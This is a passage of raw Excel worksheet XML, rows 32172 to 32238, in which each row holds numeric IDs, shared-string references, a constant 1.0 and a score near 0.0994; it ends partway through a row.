    <row r="32172" ht="15.75" customHeight="1">
      <c r="A32172" s="1">
        <v>19785.0</v>
      </c>
      <c r="B32172" s="2">
        <v>5.6805485E7</v>
      </c>
      <c r="C32172" s="2" t="s">
        <v>30955</v>
      </c>
      <c r="D32172" s="2">
        <v>1.0</v>
      </c>
      <c r="E32172" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32172" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32173" ht="15.75" customHeight="1">
      <c r="A32173" s="1">
        <v>19865.0</v>
      </c>
      <c r="B32173" s="2">
        <v>5.7163513E7</v>
      </c>
      <c r="C32173" s="2" t="s">
        <v>30956</v>
      </c>
      <c r="D32173" s="2">
        <v>1.0</v>
      </c>
      <c r="E32173" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32173" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32174" ht="15.75" customHeight="1">
      <c r="A32174" s="1">
        <v>19885.0</v>
      </c>
      <c r="B32174" s="2">
        <v>5.7257217E7</v>
      </c>
      <c r="C32174" s="2" t="s">
        <v>30957</v>
      </c>
      <c r="D32174" s="2">
        <v>1.0</v>
      </c>
      <c r="E32174" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32174" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32175" ht="15.75" customHeight="1">
      <c r="A32175" s="1">
        <v>20079.0</v>
      </c>
      <c r="B32175" s="2">
        <v>9072826.0</v>
      </c>
      <c r="C32175" s="2" t="s">
        <v>30958</v>
      </c>
      <c r="D32175" s="2">
        <v>1.0</v>
      </c>
      <c r="E32175" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32175" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32176" ht="15.75" customHeight="1">
      <c r="A32176" s="1">
        <v>20232.0</v>
      </c>
      <c r="B32176" s="2">
        <v>1.081489E7</v>
      </c>
      <c r="C32176" s="2" t="s">
        <v>30959</v>
      </c>
      <c r="D32176" s="2">
        <v>1.0</v>
      </c>
      <c r="E32176" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32176" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32177" ht="15.75" customHeight="1">
      <c r="A32177" s="1">
        <v>20704.0</v>
      </c>
      <c r="B32177" s="2">
        <v>1.4541556E7</v>
      </c>
      <c r="C32177" s="2" t="s">
        <v>30960</v>
      </c>
      <c r="D32177" s="2">
        <v>1.0</v>
      </c>
      <c r="E32177" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32177" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32178" ht="15.75" customHeight="1">
      <c r="A32178" s="1">
        <v>20930.0</v>
      </c>
      <c r="B32178" s="2">
        <v>1.6424608E7</v>
      </c>
      <c r="C32178" s="2" t="s">
        <v>30961</v>
      </c>
      <c r="D32178" s="2">
        <v>1.0</v>
      </c>
      <c r="E32178" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32178" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32179" ht="15.75" customHeight="1">
      <c r="A32179" s="1">
        <v>21132.0</v>
      </c>
      <c r="B32179" s="2">
        <v>1.840727E7</v>
      </c>
      <c r="C32179" s="2" t="s">
        <v>30962</v>
      </c>
      <c r="D32179" s="2">
        <v>1.0</v>
      </c>
      <c r="E32179" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32179" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32180" ht="15.75" customHeight="1">
      <c r="A32180" s="1">
        <v>21402.0</v>
      </c>
      <c r="B32180" s="2">
        <v>2.1901852E7</v>
      </c>
      <c r="C32180" s="2" t="s">
        <v>30963</v>
      </c>
      <c r="D32180" s="2">
        <v>1.0</v>
      </c>
      <c r="E32180" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32180" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32181" ht="15.75" customHeight="1">
      <c r="A32181" s="1">
        <v>21598.0</v>
      </c>
      <c r="B32181" s="2">
        <v>2.4054448E7</v>
      </c>
      <c r="C32181" s="2" t="s">
        <v>30964</v>
      </c>
      <c r="D32181" s="2">
        <v>1.0</v>
      </c>
      <c r="E32181" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32181" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32182" ht="15.75" customHeight="1">
      <c r="A32182" s="1">
        <v>21752.0</v>
      </c>
      <c r="B32182" s="2">
        <v>2.604617E7</v>
      </c>
      <c r="C32182" s="2" t="s">
        <v>30965</v>
      </c>
      <c r="D32182" s="2">
        <v>1.0</v>
      </c>
      <c r="E32182" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32182" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32183" ht="15.75" customHeight="1">
      <c r="A32183" s="1">
        <v>22295.0</v>
      </c>
      <c r="B32183" s="2">
        <v>3.353292E7</v>
      </c>
      <c r="C32183" s="2" t="s">
        <v>30966</v>
      </c>
      <c r="D32183" s="2">
        <v>1.0</v>
      </c>
      <c r="E32183" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32183" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32184" ht="15.75" customHeight="1">
      <c r="A32184" s="1">
        <v>22418.0</v>
      </c>
      <c r="B32184" s="2">
        <v>3.6062113E7</v>
      </c>
      <c r="C32184" s="2" t="s">
        <v>30967</v>
      </c>
      <c r="D32184" s="2">
        <v>1.0</v>
      </c>
      <c r="E32184" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32184" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32185" ht="15.75" customHeight="1">
      <c r="A32185" s="1">
        <v>23105.0</v>
      </c>
      <c r="B32185" s="2">
        <v>5094827.0</v>
      </c>
      <c r="C32185" s="2" t="s">
        <v>30968</v>
      </c>
      <c r="D32185" s="2">
        <v>1.0</v>
      </c>
      <c r="E32185" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32185" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32186" ht="15.75" customHeight="1">
      <c r="A32186" s="1">
        <v>23132.0</v>
      </c>
      <c r="B32186" s="2">
        <v>5147214.0</v>
      </c>
      <c r="C32186" s="2" t="s">
        <v>30969</v>
      </c>
      <c r="D32186" s="2">
        <v>1.0</v>
      </c>
      <c r="E32186" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32186" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32187" ht="15.75" customHeight="1">
      <c r="A32187" s="1">
        <v>23352.0</v>
      </c>
      <c r="B32187" s="2">
        <v>5.4886634E7</v>
      </c>
      <c r="C32187" s="2" t="s">
        <v>30970</v>
      </c>
      <c r="D32187" s="2">
        <v>1.0</v>
      </c>
      <c r="E32187" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32187" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32188" ht="15.75" customHeight="1">
      <c r="A32188" s="1">
        <v>23470.0</v>
      </c>
      <c r="B32188" s="2">
        <v>5717723.0</v>
      </c>
      <c r="C32188" s="2" t="s">
        <v>30971</v>
      </c>
      <c r="D32188" s="2">
        <v>1.0</v>
      </c>
      <c r="E32188" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32188" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32189" ht="15.75" customHeight="1">
      <c r="A32189" s="1">
        <v>23996.0</v>
      </c>
      <c r="B32189" s="2">
        <v>9227076.0</v>
      </c>
      <c r="C32189" s="2" t="s">
        <v>30972</v>
      </c>
      <c r="D32189" s="2">
        <v>1.0</v>
      </c>
      <c r="E32189" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32189" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32190" ht="15.75" customHeight="1">
      <c r="A32190" s="1">
        <v>23997.0</v>
      </c>
      <c r="B32190" s="2">
        <v>9229251.0</v>
      </c>
      <c r="C32190" s="2" t="s">
        <v>30973</v>
      </c>
      <c r="D32190" s="2">
        <v>1.0</v>
      </c>
      <c r="E32190" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32190" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32191" ht="15.75" customHeight="1">
      <c r="A32191" s="1">
        <v>24795.0</v>
      </c>
      <c r="B32191" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C32191" s="2" t="s">
        <v>30974</v>
      </c>
      <c r="D32191" s="2">
        <v>1.0</v>
      </c>
      <c r="E32191" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32191" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32192" ht="15.75" customHeight="1">
      <c r="A32192" s="1">
        <v>25323.0</v>
      </c>
      <c r="B32192" s="2">
        <v>1.3440692E7</v>
      </c>
      <c r="C32192" s="2" t="s">
        <v>30975</v>
      </c>
      <c r="D32192" s="2">
        <v>1.0</v>
      </c>
      <c r="E32192" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32192" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32193" ht="15.75" customHeight="1">
      <c r="A32193" s="1">
        <v>25343.0</v>
      </c>
      <c r="B32193" s="2">
        <v>1.3541757E7</v>
      </c>
      <c r="C32193" s="2" t="s">
        <v>30976</v>
      </c>
      <c r="D32193" s="2">
        <v>1.0</v>
      </c>
      <c r="E32193" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32193" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32194" ht="15.75" customHeight="1">
      <c r="A32194" s="1">
        <v>25797.0</v>
      </c>
      <c r="B32194" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C32194" s="2" t="s">
        <v>30977</v>
      </c>
      <c r="D32194" s="2">
        <v>1.0</v>
      </c>
      <c r="E32194" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32194" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32195" ht="15.75" customHeight="1">
      <c r="A32195" s="1">
        <v>26277.0</v>
      </c>
      <c r="B32195" s="2">
        <v>1.6424607E7</v>
      </c>
      <c r="C32195" s="2" t="s">
        <v>30978</v>
      </c>
      <c r="D32195" s="2">
        <v>1.0</v>
      </c>
      <c r="E32195" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32195" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32196" ht="15.75" customHeight="1">
      <c r="A32196" s="1">
        <v>26755.0</v>
      </c>
      <c r="B32196" s="2">
        <v>1.8407269E7</v>
      </c>
      <c r="C32196" s="2" t="s">
        <v>30979</v>
      </c>
      <c r="D32196" s="2">
        <v>1.0</v>
      </c>
      <c r="E32196" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32196" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32197" ht="15.75" customHeight="1">
      <c r="A32197" s="1">
        <v>27424.0</v>
      </c>
      <c r="B32197" s="2">
        <v>2.1901851E7</v>
      </c>
      <c r="C32197" s="2" t="s">
        <v>30963</v>
      </c>
      <c r="D32197" s="2">
        <v>1.0</v>
      </c>
      <c r="E32197" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32197" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32198" ht="15.75" customHeight="1">
      <c r="A32198" s="1">
        <v>27838.0</v>
      </c>
      <c r="B32198" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C32198" s="2" t="s">
        <v>30980</v>
      </c>
      <c r="D32198" s="2">
        <v>1.0</v>
      </c>
      <c r="E32198" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32198" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32199" ht="15.75" customHeight="1">
      <c r="A32199" s="1">
        <v>28372.0</v>
      </c>
      <c r="B32199" s="2">
        <v>2.6046169E7</v>
      </c>
      <c r="C32199" s="2" t="s">
        <v>30981</v>
      </c>
      <c r="D32199" s="2">
        <v>1.0</v>
      </c>
      <c r="E32199" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32199" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32200" ht="15.75" customHeight="1">
      <c r="A32200" s="1">
        <v>28546.0</v>
      </c>
      <c r="B32200" s="2">
        <v>2.6858152E7</v>
      </c>
      <c r="C32200" s="2" t="s">
        <v>30982</v>
      </c>
      <c r="D32200" s="2">
        <v>1.0</v>
      </c>
      <c r="E32200" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32200" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32201" ht="15.75" customHeight="1">
      <c r="A32201" s="1">
        <v>29182.0</v>
      </c>
      <c r="B32201" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C32201" s="2" t="s">
        <v>30983</v>
      </c>
      <c r="D32201" s="2">
        <v>1.0</v>
      </c>
      <c r="E32201" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32201" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32202" ht="15.75" customHeight="1">
      <c r="A32202" s="1">
        <v>29434.0</v>
      </c>
      <c r="B32202" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C32202" s="2" t="s">
        <v>30984</v>
      </c>
      <c r="D32202" s="2">
        <v>1.0</v>
      </c>
      <c r="E32202" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32202" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32203" ht="15.75" customHeight="1">
      <c r="A32203" s="1">
        <v>29852.0</v>
      </c>
      <c r="B32203" s="2">
        <v>3.5751232E7</v>
      </c>
      <c r="C32203" s="2" t="s">
        <v>30985</v>
      </c>
      <c r="D32203" s="2">
        <v>1.0</v>
      </c>
      <c r="E32203" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32203" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32204" ht="15.75" customHeight="1">
      <c r="A32204" s="1">
        <v>29881.0</v>
      </c>
      <c r="B32204" s="2">
        <v>3.6062112E7</v>
      </c>
      <c r="C32204" s="2" t="s">
        <v>30986</v>
      </c>
      <c r="D32204" s="2">
        <v>1.0</v>
      </c>
      <c r="E32204" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32204" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32205" ht="15.75" customHeight="1">
      <c r="A32205" s="1">
        <v>30234.0</v>
      </c>
      <c r="B32205" s="2">
        <v>3744958.0</v>
      </c>
      <c r="C32205" s="2" t="s">
        <v>30987</v>
      </c>
      <c r="D32205" s="2">
        <v>1.0</v>
      </c>
      <c r="E32205" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32205" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32206" ht="15.75" customHeight="1">
      <c r="A32206" s="1">
        <v>30484.0</v>
      </c>
      <c r="B32206" s="2">
        <v>3.9865378E7</v>
      </c>
      <c r="C32206" s="2" t="s">
        <v>30988</v>
      </c>
      <c r="D32206" s="2">
        <v>1.0</v>
      </c>
      <c r="E32206" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32206" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32207" ht="15.75" customHeight="1">
      <c r="A32207" s="1">
        <v>30619.0</v>
      </c>
      <c r="B32207" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C32207" s="2" t="s">
        <v>30989</v>
      </c>
      <c r="D32207" s="2">
        <v>1.0</v>
      </c>
      <c r="E32207" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32207" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32208" ht="15.75" customHeight="1">
      <c r="A32208" s="1">
        <v>31033.0</v>
      </c>
      <c r="B32208" s="2">
        <v>4.7813759E7</v>
      </c>
      <c r="C32208" s="2" t="s">
        <v>30990</v>
      </c>
      <c r="D32208" s="2">
        <v>1.0</v>
      </c>
      <c r="E32208" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32208" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32209" ht="15.75" customHeight="1">
      <c r="A32209" s="1">
        <v>31436.0</v>
      </c>
      <c r="B32209" s="2">
        <v>5.0171706E7</v>
      </c>
      <c r="C32209" s="2" t="s">
        <v>30991</v>
      </c>
      <c r="D32209" s="2">
        <v>1.0</v>
      </c>
      <c r="E32209" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32209" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32210" ht="15.75" customHeight="1">
      <c r="A32210" s="1">
        <v>32206.0</v>
      </c>
      <c r="B32210" s="2">
        <v>5.4814745E7</v>
      </c>
      <c r="C32210" s="2" t="s">
        <v>30992</v>
      </c>
      <c r="D32210" s="2">
        <v>1.0</v>
      </c>
      <c r="E32210" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32210" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32211" ht="15.75" customHeight="1">
      <c r="A32211" s="1">
        <v>32348.0</v>
      </c>
      <c r="B32211" s="2">
        <v>5591903.0</v>
      </c>
      <c r="C32211" s="2" t="s">
        <v>30993</v>
      </c>
      <c r="D32211" s="2">
        <v>1.0</v>
      </c>
      <c r="E32211" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32211" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32212" ht="15.75" customHeight="1">
      <c r="A32212" s="1">
        <v>32821.0</v>
      </c>
      <c r="B32212" s="2">
        <v>6216210.0</v>
      </c>
      <c r="C32212" s="2" t="s">
        <v>30994</v>
      </c>
      <c r="D32212" s="2">
        <v>1.0</v>
      </c>
      <c r="E32212" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32212" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32213" ht="15.75" customHeight="1">
      <c r="A32213" s="1">
        <v>32868.0</v>
      </c>
      <c r="B32213" s="2">
        <v>6297914.0</v>
      </c>
      <c r="C32213" s="2" t="s">
        <v>30995</v>
      </c>
      <c r="D32213" s="2">
        <v>1.0</v>
      </c>
      <c r="E32213" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32213" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32214" ht="15.75" customHeight="1">
      <c r="A32214" s="1">
        <v>32969.0</v>
      </c>
      <c r="B32214" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C32214" s="2" t="s">
        <v>30996</v>
      </c>
      <c r="D32214" s="2">
        <v>1.0</v>
      </c>
      <c r="E32214" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32214" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32215" ht="15.75" customHeight="1">
      <c r="A32215" s="1">
        <v>33063.0</v>
      </c>
      <c r="B32215" s="2">
        <v>6828489.0</v>
      </c>
      <c r="C32215" s="2" t="s">
        <v>30997</v>
      </c>
      <c r="D32215" s="2">
        <v>1.0</v>
      </c>
      <c r="E32215" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32215" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32216" ht="15.75" customHeight="1">
      <c r="A32216" s="1">
        <v>33089.0</v>
      </c>
      <c r="B32216" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C32216" s="2" t="s">
        <v>30998</v>
      </c>
      <c r="D32216" s="2">
        <v>1.0</v>
      </c>
      <c r="E32216" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32216" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32217" ht="15.75" customHeight="1">
      <c r="A32217" s="1">
        <v>33207.0</v>
      </c>
      <c r="B32217" s="2">
        <v>7189590.0</v>
      </c>
      <c r="C32217" s="2" t="s">
        <v>30999</v>
      </c>
      <c r="D32217" s="2">
        <v>1.0</v>
      </c>
      <c r="E32217" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32217" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32218" ht="15.75" customHeight="1">
      <c r="A32218" s="1">
        <v>33912.0</v>
      </c>
      <c r="B32218" s="2">
        <v>9229250.0</v>
      </c>
      <c r="C32218" s="2" t="s">
        <v>30973</v>
      </c>
      <c r="D32218" s="2">
        <v>1.0</v>
      </c>
      <c r="E32218" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32218" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32219" ht="15.75" customHeight="1">
      <c r="A32219" s="1">
        <v>34243.0</v>
      </c>
      <c r="B32219" s="2">
        <v>4736273.0</v>
      </c>
      <c r="C32219" s="2" t="s">
        <v>31000</v>
      </c>
      <c r="D32219" s="2">
        <v>1.0</v>
      </c>
      <c r="E32219" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32219" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32220" ht="15.75" customHeight="1">
      <c r="A32220" s="1">
        <v>277.0</v>
      </c>
      <c r="B32220" s="2">
        <v>1.5310621E7</v>
      </c>
      <c r="C32220" s="2" t="s">
        <v>31001</v>
      </c>
      <c r="D32220" s="2">
        <v>1.0</v>
      </c>
      <c r="E32220" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32220" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32221" ht="15.75" customHeight="1">
      <c r="A32221" s="1">
        <v>478.0</v>
      </c>
      <c r="B32221" s="2">
        <v>1.7447767E7</v>
      </c>
      <c r="C32221" s="2" t="s">
        <v>31002</v>
      </c>
      <c r="D32221" s="2">
        <v>1.0</v>
      </c>
      <c r="E32221" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32221" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32222" ht="15.75" customHeight="1">
      <c r="A32222" s="1">
        <v>523.0</v>
      </c>
      <c r="B32222" s="2">
        <v>1.8288399E7</v>
      </c>
      <c r="C32222" s="2" t="s">
        <v>31003</v>
      </c>
      <c r="D32222" s="2">
        <v>1.0</v>
      </c>
      <c r="E32222" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32222" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32223" ht="15.75" customHeight="1">
      <c r="A32223" s="1">
        <v>548.0</v>
      </c>
      <c r="B32223" s="2">
        <v>1.8745352E7</v>
      </c>
      <c r="C32223" s="2" t="s">
        <v>31004</v>
      </c>
      <c r="D32223" s="2">
        <v>1.0</v>
      </c>
      <c r="E32223" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32223" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32224" ht="15.75" customHeight="1">
      <c r="A32224" s="1">
        <v>561.0</v>
      </c>
      <c r="B32224" s="2">
        <v>1.8936994E7</v>
      </c>
      <c r="C32224" s="2" t="s">
        <v>31005</v>
      </c>
      <c r="D32224" s="2">
        <v>1.0</v>
      </c>
      <c r="E32224" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32224" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32225" ht="15.75" customHeight="1">
      <c r="A32225" s="1">
        <v>613.0</v>
      </c>
      <c r="B32225" s="2">
        <v>1.9428194E7</v>
      </c>
      <c r="C32225" s="2" t="s">
        <v>31006</v>
      </c>
      <c r="D32225" s="2">
        <v>1.0</v>
      </c>
      <c r="E32225" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32225" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32226" ht="15.75" customHeight="1">
      <c r="A32226" s="1">
        <v>658.0</v>
      </c>
      <c r="B32226" s="2">
        <v>2.0017825E7</v>
      </c>
      <c r="C32226" s="2" t="s">
        <v>31007</v>
      </c>
      <c r="D32226" s="2">
        <v>1.0</v>
      </c>
      <c r="E32226" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32226" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32227" ht="15.75" customHeight="1">
      <c r="A32227" s="1">
        <v>745.0</v>
      </c>
      <c r="B32227" s="2">
        <v>2.0885367E7</v>
      </c>
      <c r="C32227" s="2" t="s">
        <v>31008</v>
      </c>
      <c r="D32227" s="2">
        <v>1.0</v>
      </c>
      <c r="E32227" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32227" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32228" ht="15.75" customHeight="1">
      <c r="A32228" s="1">
        <v>837.0</v>
      </c>
      <c r="B32228" s="2">
        <v>2.1590148E7</v>
      </c>
      <c r="C32228" s="2" t="s">
        <v>31009</v>
      </c>
      <c r="D32228" s="2">
        <v>1.0</v>
      </c>
      <c r="E32228" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32228" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32229" ht="15.75" customHeight="1">
      <c r="A32229" s="1">
        <v>1266.0</v>
      </c>
      <c r="B32229" s="2">
        <v>2.5266486E7</v>
      </c>
      <c r="C32229" s="2" t="s">
        <v>31010</v>
      </c>
      <c r="D32229" s="2">
        <v>1.0</v>
      </c>
      <c r="E32229" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32229" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32230" ht="15.75" customHeight="1">
      <c r="A32230" s="1">
        <v>1337.0</v>
      </c>
      <c r="B32230" s="2">
        <v>2.5859765E7</v>
      </c>
      <c r="C32230" s="2" t="s">
        <v>31011</v>
      </c>
      <c r="D32230" s="2">
        <v>1.0</v>
      </c>
      <c r="E32230" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32230" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32231" ht="15.75" customHeight="1">
      <c r="A32231" s="1">
        <v>1474.0</v>
      </c>
      <c r="B32231" s="2">
        <v>2.7084106E7</v>
      </c>
      <c r="C32231" s="2" t="s">
        <v>31012</v>
      </c>
      <c r="D32231" s="2">
        <v>1.0</v>
      </c>
      <c r="E32231" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32231" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32232" ht="15.75" customHeight="1">
      <c r="A32232" s="1">
        <v>1588.0</v>
      </c>
      <c r="B32232" s="2">
        <v>2.7736273E7</v>
      </c>
      <c r="C32232" s="2" t="s">
        <v>31013</v>
      </c>
      <c r="D32232" s="2">
        <v>1.0</v>
      </c>
      <c r="E32232" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32232" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32233" ht="15.75" customHeight="1">
      <c r="A32233" s="1">
        <v>1653.0</v>
      </c>
      <c r="B32233" s="2">
        <v>2.811676E7</v>
      </c>
      <c r="C32233" s="2" t="s">
        <v>31014</v>
      </c>
      <c r="D32233" s="2">
        <v>1.0</v>
      </c>
      <c r="E32233" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32233" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32234" ht="15.75" customHeight="1">
      <c r="A32234" s="1">
        <v>1694.0</v>
      </c>
      <c r="B32234" s="2">
        <v>2.8497546E7</v>
      </c>
      <c r="C32234" s="2" t="s">
        <v>31015</v>
      </c>
      <c r="D32234" s="2">
        <v>1.0</v>
      </c>
      <c r="E32234" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32234" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32235" ht="15.75" customHeight="1">
      <c r="A32235" s="1">
        <v>1892.0</v>
      </c>
      <c r="B32235" s="2">
        <v>2.9839621E7</v>
      </c>
      <c r="C32235" s="2" t="s">
        <v>31016</v>
      </c>
      <c r="D32235" s="2">
        <v>1.0</v>
      </c>
      <c r="E32235" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32235" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32236" ht="15.75" customHeight="1">
      <c r="A32236" s="1">
        <v>2133.0</v>
      </c>
      <c r="B32236" s="2">
        <v>3.1508769E7</v>
      </c>
      <c r="C32236" s="2" t="s">
        <v>31017</v>
      </c>
      <c r="D32236" s="2">
        <v>1.0</v>
      </c>
      <c r="E32236" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32236" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32237" ht="15.75" customHeight="1">
      <c r="A32237" s="1">
        <v>2163.0</v>
      </c>
      <c r="B32237" s="2">
        <v>3.176271E7</v>
      </c>
      <c r="C32237" s="2" t="s">
        <v>31018</v>
      </c>
      <c r="D32237" s="2">
        <v>1.0</v>
      </c>
      <c r="E32237" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32237" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32238" ht="15.75" customHeight="1">
      <c r="A32238" s="1">
        <v>2281.0</v>
      </c>
      <c r="B32238" s="2">
        <v>3.2549086E7</v>
      </c>
      <c r="C32238" s="2" t="s">
        <v>31019</v>
      </c>
      <c r="D32238" s="2">
        <v>1.0</v>
      </c>
      <c r="E32238" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32238" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32239" ht="15.75" customHeight="1">
      <c r="A32239" s="1">
